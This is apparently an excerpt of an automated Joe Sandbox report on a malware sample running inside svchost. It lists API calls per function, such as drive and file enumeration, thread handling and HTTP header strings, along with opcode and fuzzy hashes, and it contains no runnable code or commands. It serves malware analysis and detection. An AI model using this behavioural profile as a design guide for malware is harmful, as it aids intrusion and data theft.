                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: mallocrealloc$closesocket
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 403730927-0
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: fwrite$fseek
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3883414211-0
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • memset.MSVCRT ref: 02BC2392
                                                                                                                                                                                                                • GetParent.USER32(?), ref: 02BC239E
                                                                                                                                                                                                                • GetWindowTextW.USER32(00000000,?,00000104), ref: 02BC23B5
                                                                                                                                                                                                                • StrStrIW.SHLWAPI(?,00000000,?,?,?,?,00000000), ref: 02BC23D6
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ParentTextWindowmemset
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 4175915554-0
                                                                                                                                                                                                                • Opcode ID: 9dcd06ed8578c6f68efa3cad6d5b0d3757119169d568e06d943efb1d31c43956
                                                                                                                                                                                                                • Instruction ID: 257395ed3f623d7a43c3eb77de86609f8cf3c78d6f45bc289a34343a1f2b1c4a
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9dcd06ed8578c6f68efa3cad6d5b0d3757119169d568e06d943efb1d31c43956
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2401F573B403246BD7209A6DAC88AA7B36DEB40555F5082BAFF49E3201EA70D95487E0
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,00000020,00000000,-00000010,?,02BB432B,?), ref: 02BB409C
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,?,02BB432B,?), ref: 02BB40A3
                                                                                                                                                                                                                • _snprintf.MSVCRT ref: 02BB40E2
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$AllocProcess_snprintf
                                                                                                                                                                                                                • String ID: %d.%d.%d.%d
                                                                                                                                                                                                                • API String ID: 1060465051-3491811756
                                                                                                                                                                                                                • Opcode ID: 50368f5fb50ae9186960708600e48120e7a41989c617a9434d2e79796f99eee3
                                                                                                                                                                                                                • Instruction ID: fba483f3abb853bac900456353962cc15e0d9d27534b79def3f5e5b0c31d69ee
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 50368f5fb50ae9186960708600e48120e7a41989c617a9434d2e79796f99eee3
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 76F081B1940710AFD3B0CF6D9804B66BBE8EF0C651B40892EF69AC7641D23491148BB0
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • TerminateThread.KERNEL32(00000000,00000000,?,?,02BC8BDE,00000000,02BC0BE3,?,?,?,?,?,?), ref: 02BCB8A0
                                                                                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,02BCB740,00000000,00000000,00000000), ref: 02BCB8B5
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,02BC0BE3,00000000,?,?,02BC8BDE,00000000), ref: 02BCB8D3
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,02BC8BDE,00000000), ref: 02BCB8E4
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: HandleThread$CloseCreateInformationTerminate
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1825730051-0
                                                                                                                                                                                                                • Opcode ID: fd88eab2c7ba76ff40079f4aecfe7b236d5e37179b1fdb5099da81145f6cc21d
                                                                                                                                                                                                                • Instruction ID: a2c7866aae18e335454f32a516ad4e128752a8a92974cfd45b946ef873380998
                                                                                                                                                                                                                • Opcode Fuzzy Hash: fd88eab2c7ba76ff40079f4aecfe7b236d5e37179b1fdb5099da81145f6cc21d
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0EF05474A84304BBE7709B65EC4BF5E37ACEB05B49F600598FA05E71C0D7B4B5108B64
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID: private$public
                                                                                                                                                                                                                • API String ID: 0-4176808989
                                                                                                                                                                                                                • Opcode ID: 4a4bcab08c96a9de7a17b48292f18dc2a104350d9cef34a231953395ab11e24a
                                                                                                                                                                                                                • Instruction ID: 39843ed77b78efe42e3a7413c1cb371f84b9090feec5068c6fbfc9ec0bd891b1
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4a4bcab08c96a9de7a17b48292f18dc2a104350d9cef34a231953395ab11e24a
                                                                                                                                                                                                                • Instruction Fuzzy Hash: F7414B326042058BCF388A6C85553B67363EBC5358B7846EFD94A8BA54F7A1E545C780
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 02BCE6B0: memset.MSVCRT ref: 02BCE6CF
                                                                                                                                                                                                                  • Part of subcall function 02BCE6B0: memset.MSVCRT ref: 02BCE6F1
                                                                                                                                                                                                                  • Part of subcall function 02BCE6B0: GetLogicalDriveStringsA.KERNEL32(00000104,?), ref: 02BCE706
                                                                                                                                                                                                                  • Part of subcall function 02BCE6B0: SetErrorMode.KERNEL32(00000001), ref: 02BCE71F
                                                                                                                                                                                                                  • Part of subcall function 02BCE6B0: GetDriveTypeA.KERNEL32(?), ref: 02BCE768
                                                                                                                                                                                                                  • Part of subcall function 02BCE6B0: SetCurrentDirectoryA.KERNEL32(?), ref: 02BCE77B
                                                                                                                                                                                                                  • Part of subcall function 02BCE6B0: FindFirstFileA.KERNEL32(?,?), ref: 02BCE7DD
                                                                                                                                                                                                                  • Part of subcall function 02BCE6B0: SetErrorMode.KERNEL32(?), ref: 02BCEAF3
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(617D731E), ref: 02BCEB0B
                                                                                                                                                                                                                  • Part of subcall function 02BC39D0: EnterCriticalSection.KERNEL32(02BFFB68,75570F00,00000000,75572F00), ref: 02BC39E9
                                                                                                                                                                                                                  • Part of subcall function 02BC39D0: GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 02BC39FB
                                                                                                                                                                                                                  • Part of subcall function 02BC39D0: _snprintf.MSVCRT ref: 02BC3A1B
                                                                                                                                                                                                                  • Part of subcall function 02BC39D0: SetCurrentDirectoryA.KERNEL32(?), ref: 02BC3A2B
                                                                                                                                                                                                                  • Part of subcall function 02BC39D0: PathAddBackslashA.SHLWAPI(?), ref: 02BC3B00
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CurrentDirectory$BackslashDriveErrorModePathmemset$CriticalEnterFileFindFirstLogicalSectionStringsType_snprintf
                                                                                                                                                                                                                • String ID: 617D731E$COLV
                                                                                                                                                                                                                • API String ID: 2461973751-3105192896
                                                                                                                                                                                                                • Opcode ID: 00b8dcb329a326f138f9560f1b994bc10568786b48364314305191a1697257a2
                                                                                                                                                                                                                • Instruction ID: c5962cf860114d36555e0873ec976d626f7e60c00eef312d53b48734c51abdcb
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 00b8dcb329a326f138f9560f1b994bc10568786b48364314305191a1697257a2
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 42B092A1B90300A1709837E83C46C692B6D2A84E023704AEE7643108C54DD18190AB7B
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: malloc$free
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1480856625-0
                                                                                                                                                                                                                • Opcode ID: 1ff6215390c1cc3faaad82fab9e7b65c946c87036aa253557814946080e39a38
                                                                                                                                                                                                                • Instruction ID: 5c588fcbd2237a84ed566351586b33b83c61fe3700a8216eb36cdb464ce8718b
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1ff6215390c1cc3faaad82fab9e7b65c946c87036aa253557814946080e39a38
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4B21AFB16013059FD710CF1AD984A46FBE8FF99310F15C5AAE6498B362D7B5E910CFA0
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,00000014,00000000,?,?,?,02BBEF5B,00000000,?,?,00000000,Content-Type,?,?,00000000,Referer), ref: 02BBEB1F
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,?,02BBEF5B,00000000,?,?,00000000,Content-Type,?,?,00000000,Referer,?), ref: 02BBEB26
                                                                                                                                                                                                                • memset.MSVCRT ref: 02BBEB36
                                                                                                                                                                                                                • memcpy.MSVCRT(00000000,?,00000000,00000000,00000000,00000014,?,02BBEF5B,00000000,?,?,00000000,Content-Type,?,?,00000000), ref: 02BBEB41
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$AllocProcessmemcpymemset
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 471586229-0
                                                                                                                                                                                                                • Opcode ID: 7423c6a89965f8944d68b4886f373f8f7a6adb4de3f56fc3cb5ca7e7a099eb0e
                                                                                                                                                                                                                • Instruction ID: c80bd25a5b6b541bd2388f965fdf9b30b61584d8f4a9929b50189f603fa890c8
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7423c6a89965f8944d68b4886f373f8f7a6adb4de3f56fc3cb5ca7e7a099eb0e
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7601F2336002156BD7329A68ACC4FEBB7ECEF46760B844781FE16CB191D760E90487E0
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,?,?,?,00000000,?,02BBFA2B,?,?,?), ref: 02BBF388
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,?,02BBFA2B,?,?,?), ref: 02BBF38F
                                                                                                                                                                                                                • memset.MSVCRT ref: 02BBF39F
                                                                                                                                                                                                                • memcpy.MSVCRT(00000000,?,?,00000000,00000000,?,?,02BBFA2B,?,?,?), ref: 02BBF3AA
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$AllocProcessmemcpymemset
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 471586229-0
                                                                                                                                                                                                                • Opcode ID: 8b181cff673113253bdef02b3a737c826583d8d3e4a7d9acebc80ae3461898fd
                                                                                                                                                                                                                • Instruction ID: 02cd2ca74084abcf3236a32b05680dda7670d2201db481e94ed3f0c922b3afa3
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8b181cff673113253bdef02b3a737c826583d8d3e4a7d9acebc80ae3461898fd
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4AF0E533A0161077D6616AA9AC44FAF776CEF867A0F414350FF04EB241CA64DC1487F4
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?), ref: 02BF4145
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000), ref: 02BF4148
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?), ref: 02BF4155
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 02BF4158
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$Process$FreeValidate
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1670920773-0
                                                                                                                                                                                                                • Opcode ID: d1580bcb031b66bd2b2213683ecadffec105f14ca9b64bbfe272fea829f41f0b
                                                                                                                                                                                                                • Instruction ID: 9214d891afc8c2011d47c8a6cb7af97f8f8a0290d7915e91daf54fec394dd846
                                                                                                                                                                                                                • Opcode Fuzzy Hash: d1580bcb031b66bd2b2213683ecadffec105f14ca9b64bbfe272fea829f41f0b
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 71E0EC32A4122877D6A06AB66C08F8BBF6CEF95BA1F458411F719A72409B719414CBF0